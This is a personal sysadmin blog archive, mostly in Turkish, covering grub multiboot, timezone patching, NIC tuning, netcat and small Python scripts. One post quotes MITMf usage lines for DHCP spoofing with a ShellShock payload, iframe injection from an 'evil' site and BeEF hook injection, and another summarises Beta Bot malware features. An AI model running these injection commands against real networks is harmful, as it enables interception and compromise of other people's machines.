Wednesday, November 11, 2015

multiple boot with grub on oracle enterprise linux 6.5

Kurulumlar ortak swap alanı farklı rootfs kullanıyor.
 
[root@node4 ~]# blkid
/dev/sdb1: UUID="b8098d8d-b31b-40af-9dcd-96a7682a4320" TYPE="ext4"
/dev/sdb2: UUID="09e6a3a8-b681-4403-bd14-a30cbc1f3080" TYPE="swap"
/dev/sdb3: UUID="0a647f56-2e21-495b-9be7-875633145a98" TYPE="ext4"
/dev/sdb4: UUID="aa9054bb-e9d1-43ba-85df-74a4d8ed8438" TYPE="ext4"
/dev/sdb5: UUID="4c382078-f1f1-4a8d-bf25-0748de9c6e54" TYPE="ext4"
 
[root@node4 ~]# cat /etc/grub.conf | grep -v ^# | grep -v ^$
default=0
timeout=10
splashimage=(hd1,4)/boot/grub/splash.xpm.gz
hiddenmenu
title Node 1 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,0)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=b8098d8d-b31b-40af-9dcd-96a7682a4320 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 2 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,2)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=0a647f56-2e21-495b-9be7-875633145a98 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 3 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,3)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=aa9054bb-e9d1-43ba-85df-74a4d8ed8438 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 4 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,4)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=4c382078-f1f1-4a8d-bf25-0748de9c6e54 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img

Friday, November 6, 2015

OS X El Capitan: otomatik metin duzeltme ozelliginin kapatilmasi

  1. Open System Preferences from the  Apple menu as usual, then go to “Keyboard”
  2. Choose the “Text” tab
  3. Uncheck the box next to “Correct spelling automatically”

Monday, October 26, 2015

nginx: reverse proxy with basic authentication

/etc/nginx/sites-enabled/default:

server {
...

location /web/x/ {
        proxy_pass http://127.0.0.1:8080/;
       auth_basic "Restricted";
       auth_basic_user_file /etc/nginx/.htpasswd; 
}
...
}

Tuesday, October 20, 2015

linux, freebsd: 8 Kasım yaz saatının sonra ermesı - kış saati uygulaması için sunucuda yapılması gerekenler

 8 Kasım 2015 kış saatı uygulaması (yaz saati uygulamasının sona ermesi) için sunucuda yapılması gerekenler:

Ntp sunucu kullanılıyor olsanız dahi patch'i uygulamak durumundasınız.

Redhat Linux kış saati 6.5 üzerinde yaptığım işlemler

Eğer redhat 6 tabanlı bir sisteminiz varsa aşağıdaki rpm kurulumu işinizi görecektir.Eğer redhat 7 tabanlı bir sisteminiz varsa buna uygun rpm'i yüklemelisiniz. Patch kurulumu sonrası sisteminizin otomatik saat güncellemesini alabimesi için doğru timezone'da olduğunuzu da teyid etmelisiniz. (Bknz:http://siyahsapkaorg.blogspot.com.tr/2015/10/linux-how-to-get-timezone-information.html)

[root@node1 ~]# rpm -Uvh http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
Retrieving http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
warning: /var/tmp/rpm-tmp.pTNoiM: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
Preparing...                ########################################### [100%]
   1:tzdata                 ########################################### [100%]

[root@node1 ~]# zdump -c 2015,2016 -v "Europe/Istanbul"
Europe/Istanbul  -9223372036854775808 = NULL
Europe/Istanbul  -9223372036854689408 = NULL
Europe/Istanbul  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  9223372036854689407 = NULL
Europe/Istanbul  9223372036854775807 = NULL



https://rhn.redhat.com/errata/RHEA-2015-1863.html

https://bugs.launchpad.net/ubuntu/+source/tzdata/+bug/1503560


https://phoneboy.com/1381/use-ntp-you-still-need-daylight-saving-time-patches/ 

FreeBSD kış saati 8.3 x86_64 sistem üzerinde yaptığım işlemler:


tedbir amaçlı eski zoneinfo dosyalarımızın backup'ını alalım

# tar -pczf zoneinfo-backup.tgz /usr/share/zoneinfo-backup

zone dosyamızın yolunu öğrenelim

Bu dosyayı güncel olanı ile değiştireceğiz.

# ls -al /etc/localtime
lrwxr-xr-x  1 root  wheel  35 Jun 11  2014 /etc/localtime -> /usr/share/zoneinfo/Europe/Istanbul



# pwd
/root
# mkdir tz

# cd tz
# wget --retr-symlinks 'ftp://ftp.iana.org/tz/tz*-latest.tar.gz'
# gzip -dc tzcode-latest.tar.gz | tar -xf -
# gzip -dc tzdata-latest.tar.gz | tar -xf -
# make TOPDIR=/root/tz install


zone dosyamızı güncelleyelim

# cp /root/tz/etc/zoneinfo/Europe/Istanbul /usr/share/zoneinfo/Europe/Istanbul


ve son olarak kontrol işlemlerimizi gerçekleştiriyoruz:

# date "+%Z %z"
EEST +0300


# zdump -c 2015,2016 -v /etc/localtime
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Thu Dec 31 15:00:00 2015 UTC = Sat Dec  3 17:30:07 219250468 EET isdst=0 gmtoff=7200
/etc/localtime  Sat Dec  3 17:30:07 219250468 UTC = Sun Dec  4 17:30:07 219250468 EET isdst=0 gmtoff=7200 



Java Virtual Machine için time zone ayarı:,

java-1.7.0-openjdk-1.7.0.55-2.4.7.1.0.1.el6_5.x86_64
 
# export TZ=Europe/Istanbul ; java -jar /tmp/hede.jar ; date "+%Z%z %F %T"
Tue Oct 27 13:43:56 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445942636596 => Tue Oct 27 13:43:56 EEST 2015
Current time zone: Europe/Istanbul
EEST+0300 2015-10-27 13:43:56

http://www.java-examples.com/get-current-timezone-using-java-calendar

Eğer openjdk kullanıyorsanız. oracle jdk tzupdate yöntemi ile elde ettiğiniz timezone dosyalarını /usr/share/javazi/  dizinine kopyalamalısınız.

$ java -jar get-time-zone.jar
Tue Oct 27 15:21:28 EET 2015
Europe/Istanbul
Current time in milliseconds = 1445952088773 => Tue Oct 27 15:21:28 EET 2015
Current time zone: Europe/Istanbul

$ sudo cp -pfr openjdk/javazi/* /usr/share/javazi/

$ java -jar get-time-zone.jar
Tue Oct 27 16:22:02 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445952122068 => Tue Oct 27 16:22:02 EEST 2015
Current time zone: Europe/Istanbul


$ ls openjdk/javazi/
Africa   Antarctica  Atlantic   CET      EET  EST5EDT  Europe  HST     MET  MST7MDT  PST8PDT  WET
America  Asia        Australia  CST6CDT  EST  Etc      GMT     Indian  MST  Pacific  SystemV  ZoneInfoMappings

Thursday, October 15, 2015

how to install bigvideo.js with bower on centos 6.5

# yum install npm 
 
# npm install -g bower
 
-bash-4.1$ bower install BigVideo.js
bower jquery#>=1.7.2            cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.7.2          validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.7.2
bower jquery-ui#>=1.8.22        cached git://github.com/components/jqueryui.git#1.11.4
bower jquery-ui#>=1.8.22      validate 1.11.4 against git://github.com/components/jqueryui.git#>=1.8.22
bower video.js#>=3.2.0          cached git://github.com/videojs/video.js.git#5.0.0
bower video.js#>=3.2.0        validate 5.0.0 against git://github.com/videojs/video.js.git#>=3.2.0
bower imagesloaded#>=2.1.1      cached git://github.com/desandro/imagesloaded.git#3.1.8
bower imagesloaded#>=2.1.1    validate 3.1.8 against git://github.com/desandro/imagesloaded.git#>=2.1.1
bower BigVideo.js#*             cached git://github.com/dfcb/BigVideo.js.git#1.1.5
bower BigVideo.js#*           validate 1.1.5 against git://github.com/dfcb/BigVideo.js.git#*
bower jquery#>=1.6              cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.6            validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.6
bower eventEmitter#4.x          cached git://github.com/Olical/EventEmitter.git#4.3.0
bower eventEmitter#4.x        validate 4.3.0 against git://github.com/Olical/EventEmitter.git#4.x
bower eventie#>=1.0.4 <2        cached git://github.com/desandro/eventie.git#1.0.6
bower eventie#>=1.0.4 <2      validate 1.0.6 against git://github.com/desandro/eventie.git#>=1.0.4 <2
bower imagesloaded#>=2.1.1     install imagesloaded#3.1.8
bower video.js#>=3.2.0         install video.js#5.0.0
bower jquery-ui#>=1.8.22       install jquery-ui#1.11.4
bower jquery#>=1.7.2           install jquery#2.1.4
bower BigVideo#~1.1.5          install BigVideo#1.1.5
bower eventEmitter#4.x         install eventEmitter#4.3.0
bower eventie#>=1.0.4 <2       install eventie#1.0.6

imagesloaded#3.1.8 bower_components/imagesloaded
├── eventEmitter#4.3.0
└── eventie#1.0.6

video.js#5.0.0 bower_components/video.js

jquery-ui#1.11.4 bower_components/jquery-ui
└── jquery#2.1.4

jquery#2.1.4 bower_components/jquery

BigVideo#1.1.5 bower_components/BigVideo
├── imagesloaded#3.1.8
├── jquery#2.1.4
├── jquery-ui#1.11.4
└── video.js#5.0.0

eventEmitter#4.3.0 bower_components/eventEmitter

eventie#1.0.6 bower_components/eventie 

linux: how to get timezone information


timezone bilgisi /etc/localtime dosyasinda saklanir.
bu dosya binary formattadir. binary dosyalar icerisindeki degiskenler strings komutu ile analiz edilebilir.

$ strings /etc/localtime | more


timezone dosya boyutunu mevcut timezone dosyalari ile kiyaslayarak time zone bilgisi ogrenme:

$ cd /usr/share/zoneinfo
$ find * -type f -exec sh -c "diff -q /etc/localtime '{}' > /dev/null && echo {}" \;


datetime komutu ile timezone bilgisi ogrenme:

$ date +'%:z %Z'

Wednesday, October 14, 2015

linux shell: how to run bash command with timeout

bash$     (date >> /tmp/bw.log ; vnstat -l -i bond0 &>> /tmp/bw.log) & sleep 5 ; kill $!

linux shell: paste komutu kullanımı

$ cat testfile
A 1
B 2
C 3
D 4
E 5
F 6
G 7
H 8
I 9
J 10
                                                                                                                                                                                                                                         $ cut -d' ' -f2 testfile
1
2
3
4
5
6
7
8
9
10
                                                                                                                                                                                                                                         $ cut -d' ' -f2 testfile | paste -d, - -
1,2
3,4
5,6
7,8
9,10


Keywords: how to parse and group lines, how to convert lines to columns, how to  convert rows to columns

Thursday, October 8, 2015

bash: how to send syslog test message

echo "<133>$0[$$]: Test syslog message from Netcat" | nc -w1 -u 192.168.1.254 1501

Linux: how to optimize an ethernet adapter settings

 Platform:

Red Hat Enterprise Linux Server release 6.5 (Santiago)



how to learn ethernet device driver details

ethtool -i eth1

# ethtool -i eth1
driver: igb
version: 5.2.5
firmware-version: 2.1.0
bus-info: 0000:01:00.1
supports-statistics: yes
supports-test: yes
supports-eeprom-access: yes
supports-register-dump: yes
supports-priv-flags: no


# lspci -v | grep -A 14 '01:00.1'
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
        Subsystem: Intel Corporation Device 34de
        Flags: bus master, fast devsel, latency 0, IRQ 28
        Memory at b1a00000 (32-bit, non-prefetchable) [size=128K]
        I/O ports at 1000 [size=32]
        Memory at b1a40000 (32-bit, non-prefetchable) [size=16K]
        Capabilities: [40] Power Management version 2
        Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
        Capabilities: [60] MSI-X: Enable+ Count=10 Masked-
        Capabilities: [a0] Express Endpoint, MSI 00
        Capabilities: [100] Advanced Error Reporting
        Capabilities: [140] Device Serial Number 00-1e-67-ff-ff-0c-9a-29
        Kernel driver in use: igb
        Kernel modules: igb



how to list ethernet adapter list

[root@inseptra ~]# lspci  | grep Ethernet
01:00.0 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
02:00.0 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)
02:00.1 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)



how to learn supported RX / TX ring buffer settings of an ethernet adapter

# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             256
RX Mini:        0
RX Jumbo:       0
TX:             256



how to change ethernet adapter rx tx ring buffer settings

# ethtool -G eth1 rx 4096 tx 4096
# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096



how to change ethernet features for increase ids/ips packet processing performance

disable RX checksumming :
# ethtool -K eth1 rx off

disable TX checksumming
#
ethtool -K eth1 tx off

disable TCP segmentation offload# ethtool -K eth1 tso off
disable generic receive offload# ethtool -K eth1 gro off
disable generic segmentation offload# ethtool -K eth1 gso off

disable scatter-gather # ethtool -K eth1 sg off

how to show features of ethernet adapter

# ethtool -k eth1
Features for eth1:
rx-checksumming: on
tx-checksumming: on
        tx-checksum-ipv4: on
        tx-checksum-ip-generic: off [fixed]
        tx-checksum-ipv6: on
        tx-checksum-fcoe-crc: off [fixed]
        tx-checksum-sctp: off [fixed]
scatter-gather: on
        tx-scatter-gather: on
        tx-scatter-gather-fraglist: off [fixed]
tcp-segmentation-offload: on
        tx-tcp-segmentation: on
        tx-tcp-ecn-segmentation: off [fixed]
        tx-tcp6-segmentation: on
udp-fragmentation-offload: off [fixed]
generic-segmentation-offload: on
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: on
tx-vlan-offload: on
ntuple-filters: off [fixed]
receive-hashing: on
highdma: on [fixed]
rx-vlan-filter: on [fixed]
vlan-challenged: off [fixed]
tx-lockless: off [fixed]
netns-local: off [fixed]
tx-gso-robust: off [fixed]
tx-fcoe-segmentation: off [fixed]
fcoe-mtu: off [fixed]
tx-nocache-copy: on
loopback: off [fixed]
rx-fcs: off [fixed]
rx-all: off [fixed]



Keywords: eth0 overrun problem, eth0 drop problem, packet processsing, ips, ids, suricata, snort, bro network security monitor, packet drop


2015-10-08 - Ali Okan Yuksel - yukselao@yandex.com




Sunday, October 4, 2015

mitmf: ImportError: cannot import name LOG


About mitmf:

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
 
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js



Hata:

Traceback (most recent call last):
  File "./mitmf.py", line 180, in <module>
    from core.protocols.smb.SMBserver import SMBserver
  File "/usr/share/mitmf/core/protocols/smb/SMBserver.py", line 5, in <module>
    from impacket import version, smbserver, LOG
ImportError: cannot import name LOG



Çözüm:

root@kali:~# pip install impacket --upgrade

Beta Bot Analysis

Win32.Neurevt, circulating under the name Beta Bot is an HTTP bot that entered in the underground market in the first part of 2013.

As we can see the information from the Sales Thread, this piece of code which written in C++ has many functionalities. Among others, we found:


  • AV-Disabling
  • Bot Killer
  • Ring3 Rootkit
  • Custom Injection Techniques
  • Proactive Defense Mode


At less than €500, Beta Bot is sold relatively cheap, considering its vast feature list. It includes also standard features for today’s bots, like different DOS-attack methods, DNS Blocker, etc...


Reference & details:

http://resources.infosecinstitute.com/beta-bot-analysis-part-1/

http://resources.infosecinstitute.com/beta-bot-analysis-part-2/


Credits and References:

https://github.com/KenMacD/betabot-re
https://blog.fortinet.com/post/neurevt-bot-analysis
http://vrt-blog.snort.org/2014/05/betabot-process-injection.html
https://asert.arbornetworks.com/beta-bot-a-code-review/

Thursday, October 1, 2015

IPMI: Intelligent Platform Management Interface

The Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware (BIOS or UEFI) and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell.


fence_ipmilan

http://linux.die.net/man/8/fence_ipmilan

fence_ipmilan is an I/O Fencing agent which can be used with machines controlled by IPMI. This agent calls support software using ipmitool (http://ipmitool.sf.net/).
To use fence_ipmilan with HP iLO 3 you have to enable lanplus option (lanplus / -P) and increase wait after operation to 4 seconds (power_wait=4 / -T 4)
fence_ipmilan accepts options on the command line as well as from stdin. Fenced sends parameters through stdin when it execs the agent. fence_ipmilan can be run by itself with command line options. This is useful for testing and for turning outlets on or off from scripts.

Monday, September 28, 2015

python: multicast echo server


python: multicast echo server

code:

#!/usr/bin/python

##
# Author: Ali Okan Yuksel
# E-mail: okan.yuksel[at]vizyonarge.com
##


import socket
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 1111))
mreq = struct.pack("=4sl", socket.inet_aton("226.2.14.8"), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

while True:
  line=sock.recv(10240)
  print line
  print "--"

Wednesday, September 16, 2015

How to: Delete a remote Git tag

git tag -d 12345
git push origin :refs/tags/12345

python traceback module usage

In Python 2.x:
import traceback

try:
    raise TypeError("Oups!")
except Exception, err:
    try:
        raise TypeError("Again !?!")
    except:
        pass

    traceback.print_exc()


Python 3.x :
import traceback

try:
    raise TypeError("Oups!")
except Exception as err:
    try:
        raise TypeError("Again !?!")
    except:
        pass

    traceback.print_tb(err.__traceback__)

Thursday, September 3, 2015

how to import csv file to sqlite3 database with custom a separator char on bash shell

how to import csv file to sqlite3 database with custom separator on bash shell:

echo -e '.separator ";"\n.import x datatmp' | sqlite3 /usr/local/app/graphs/data/data.db

Tuesday, August 18, 2015

stdout ciktisini ters cevirerek yazdirmak

tac - concatenate and print files in reverse


[root@node1 basic-setup]# cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 8.8.8.8

[root@node1 basic-setup]# cat /etc/resolv.conf | tac
nameserver 8.8.8.8
# Generated by NetworkManager

sed: delete a line containing a specific string using gnu sed

sed -i '/pattern to match/d' ./infile

Monday, August 17, 2015

git archive ile branch export islemi

git archive <branch_name> | gzip > file.tgz

orn:

git archive beta | gzip > beta.tgz

Thursday, July 30, 2015

linux shell: convert epoch time to datetime format

[root@logserver proxy]# date -d @1438240254 "+%F %T"
2015-07-30 10:10:54


python: reading fifo example


fifo - first-in first-out special file, named pipe

A FIFO special file (a named pipe) is similar to a pipe, except that
       it is accessed as part of the filesystem.  It can be opened by
       multiple processes for reading or writing.  When processes are
       exchanging data via the FIFO, the kernel passes all data internally
       without writing it to the filesystem.  Thus, the FIFO special file
       has no contents on the filesystem; the filesystem entry merely serves
       as a reference point so that processes can access the pipe using a
       name in the filesystem.

SEE ALSO  




fifo reader code:

#!/usr/bin/python


__author__ = "Ali Okan Yuksel <okan@siyahsapka.org>"

import sys



def main():
        print "INFO application started"
        fifo="okantest.fifo"
        fd=open(fifo,"r")
        while True:
                line = fd.readline()
                if line !="":
                        sys.stdout.write(line)


if __name__=="__main__":
        main()


data sender bash call:

[root@logserver ~]# for i in `seq 1 1000`; do echo $i > /opt/proxy/okantest.fifo ; done

linux: sudo ile yetkilendirme

sudo komutu ile sadece belirli bir komutun web uzerinden root yetkisi ile tetiklenmesi icin ihtiyac duymustum.

# cat /etc/sudoers.d/apache
apache        ALL=(ALL)       NOPASSWD: /opt/build/wwwroot/build.sh


Friday, July 24, 2015

netcat ile bağlantı testleri

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

TCP server:
# nc -k -l 23

UDP server:
# nc -k -u -l 23

TCP client:
# nc -w0 172.16.41.82 23 <<< "tcp client example"

UDP client:
# nc -w0 -u 172.16.41.82 23 <<< "udp client example"

-w:  timeout
-k:
-l: listen

 Syntax

nc [-46bCDdhklnrStUuvZz] [-I length] [-i interval] [-O length]
   [-P proxy_username] [-p source_port] [-q seconds] [-s source]
   [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
   [-x proxy_address[:port]] [destination] [port]

Options


-4    Forces nc to use IPv4 addresses only.
-6    Forces nc to use IPv6 addresses only.
-b    Allow broadcast.
-C    Send CRLF as line-ending.
-D    Enable debugging on the socket.
-d    Do not attempt to read from stdin.
-h    Prints out nc help.
-I length    Specifies the size of the TCP receive buffer.
-i interval    Specifies a delay time interval between lines of text sent and received. Also causes a delay time between connections to multiple ports.
-k    Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option.
-l    Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored.
-n    Do not do any DNS or service lookups on any specified addresses, hostnames or ports.
-O length    Specifies the size of the TCP send buffer.
-P proxy_username    Specifies a username to present to a proxy server that requires authentication. If no username is specified then authentication will not be attempted. Proxy authentication is only supported for HTTP CONNECT proxies at present.
-p source_port    Specifies the source port nc should use, subject to privilege restrictions and availability.
-q seconds    after EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever.
-r    Specifies that source and/or destination ports should be chosen randomly instead of sequentially within a range or in the order that the system assigns them.
-S    Enables the RFC 2385 TCP MD5 signature option.
-s source    Specifies the IP of the interface which is used to send the packets. For UNIX-domain datagram sockets, specifies the local temporary socket file to create and use so that datagrams can be received. It is an error to use this option in conjunction with the -l option.
-T toskeyword    Change IPv4 TOS value. toskeyword may be one of critical, inetcontrol, lowcost, lowdelay, netcontrol, throughput, reliability, or one of the DiffServ Code Points: ef, af11 ... af43, cs0 ... cs7; or a number in either hex or decimal.
-t    Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO and WILL requests. This makes it possible to use nc to script telnet sessions.
-U    Specifies to use UNIX-domain sockets.
-u    Use UDP instead of the default option of TCP. For UNIX-domain sockets, use a datagram socket instead of a stream socket. If a UNIX-domain socket is used, a temporary receiving socket is created in /tmp unless the -s flag is given.
-V rtable    Set the routing table to be used. The default is 0.
-v    Have nc give more verbose output.
-w timeout    Connections which cannot be established or are idle timeout after timeout seconds. The -w flag has no effect on the -l option, i.e. nc will listen forever for a connection, with or without the -w flag. The default is no timeout.
-X proxy_protocol    Requests that nc should use the specified protocol when talking to the proxy server. Supported protocols are "4" (SOCKS v.4), "5" (SOCKS v.5) and "connect" (HTTPS proxy). If the protocol is not specified, SOCKS version 5 is used.
-x proxy_address[:port]    Requests that nc should connect to destination using a proxy at proxy_address and port. If port is not specified, the well-known port for the proxy protocol is used (1080 for SOCKS, 3128 for HTTPS).
-Z    DCCP mode.
-z    Specifies that nc should just scan for listening daemons, without sending any data to them. It is an error to use this option in conjunction with the -l option.

iphone: Illegal instruction: 4 hatası

jailbroken iphone device:

iPhone:/ root# ./usr/bin/aSMS
Illegal instruction: 4

iPhone:/ root# sed -i'' 's/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;' ./usr/bin/aSMS

iPhone:/ root# ldid -s ./usr/bin/aSMS
ldid.cpp(1205): _assert(signature != NULL); errno=0

iPhone:/ root# /usr/bin/aSMS
1437721353 set_ssl: cannot load libssl.0.9.7.dylib

iPhone:/ root# ls /usr/lib/libssl.*
/usr/lib/libssl.0.9.8.dylib  /usr/lib/libssl.dylib

iPhone:/ root# ln -s /usr/lib/libssl.0.9.8.dylib /usr/lib/libssl.0.9.7.dylib

iPhone:/ root# /usr/bin/aSMS
iPhone:/ root# launchctl load -w /Library/LaunchDaemons/com.googlecode.aSMS.plist

Tuesday, July 7, 2015

"hacking team" hacked

Someone hacked the cyberweapons arms manufacturer Hacking Team and posted 400 GB of internal company data.

Hacking Team is a pretty sleazy company, selling surveillance software to all sorts of authoritarian governments around the world. Reporters Without Borders calls it one of the enemies of the Internet. Citizen Lab has published many reports about their activities.
...
Source: https://www.schneier.com/blog/archives/2015/07/hacking_team_is.html

Slashdot thread. Hacker News thread.

Tixati bittorrent client http://www.tixati.com/

Thursday, June 25, 2015

Disassemblers / decompilers


W32Dasm
W32DASM was an excellent 16/32 bit disassembler for Windows, it seems it is no longer developed. the latest version available is from 2003
Capstone
Capstone is a lightweight multi-platform, multi-architecture disassembly framework.
Some of ts features are
  • multi-architectures: Arm, Arm64 (Armv8), Mips, PowerPC, Sparc, SystemZ, XCore & Intel
  • Clean/simple/lightweight/intuitive architecture-neutral API.
  • Provide details on disassembled instruction (called “decomposer” by some others).
  • Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.
  • Implemented in pure C language, with bindings for Python, Ruby, C#, NodeJS, Java, GO, OCaml & Vala available.
  • Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).
  • Thread-safe by design.
  • Special support for embedding into firmware or OS kernel.
  • Distributed under the open source BSD license.
BORG Disassembler
BORG is an excellent Win32 Disassembler with GUI.
DSM Studio Disassembler
DSM Studio is an easy-to-use yet comprehensive application that can aid you in the disassembly and inspection of executables built for the Intel x86 architecture.
Decompiler
Decompiler is an easy to use and simply application designed to read program binaries and decompile executable or DLL files. The application is designed to decompile executables for any processor architecture and not be tied to a particular instruction set. Although currently only a x86 front end is implemented, there is nothing preventing you from implementing a 68K, Sparc, or VAX front end if you need one.
Lida - linux interactive disassembler
lida is a fast feature packed interactive ELF disassembler / code-/cryptoanalyzer based on bastards libdisasm
BugDbg x64 v0.7.5
BugDbg x64 is a user-land debugger designed to debug native 64-bit applications. BugDbg is released as Freeware.
distorm3
A lightweight, Easy-to-Use and Fast Disassembler/Decomposer Library for x86/AMD64
Udis86
Udis86 is an easy-to-use, minimalistic disassembler library (libudis86) for the x86 class of instruction set architectures. It has a convenient interface for use in the analysis and instrumentation of binary code.
BeaEngine
This project is a package with a multi-platform x86 and x64 disassembler library (Solaris, MAC OSX, AIX, Irix, OS/2, Linux, Windows)
C4 Decompiler
  • General Machine Code to C Decompiler
  • Free Windows I64 target edition
  • Interactive Windows GUI

REC Studio 4 - Reverse Engineering Compiler
REC Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X or raw executable file, and attempts to produce a C-like representation of the code and data used to build the executable file. It has been designed to read files produced for many different targets, and it has been compiled on several host systems.
Retargetable Decompiler
A retargetable decompiler that can be utilized for source code recovery, static malware analysis, etc. The decompiler is supposed to be not bounded to any particular target architecture, operating system, or executable file format.
miasm
Miasm is a a free and open source (GPLv2) reverse engineering framework written in python. Miasm aims at analyzing/modifying/generating binary programs.
Free Code Manipulation Library
This is a general purpose machine code manipulation library for IA-32 and Intel 64 architectures. The library supports UNIX-like systems as well as Windows and is highly portable. The FCML library is free for commercial and non-commercial use as long as the terms of the LGPL license are met. Currently it supports such features as:
  • A one-line disassembler
  • A one-line assembler
  • An experimental multi-pass load-and-go assembler (Multi line!)
  • Support for the Intel and AT&T syntax
  • An instruction renderer
  • An instruction parser
  • Instructions represented as generic models
  • UNIX/GNU/Linux and Windows support
  • Portable - written entirely in C (no external dependencies)
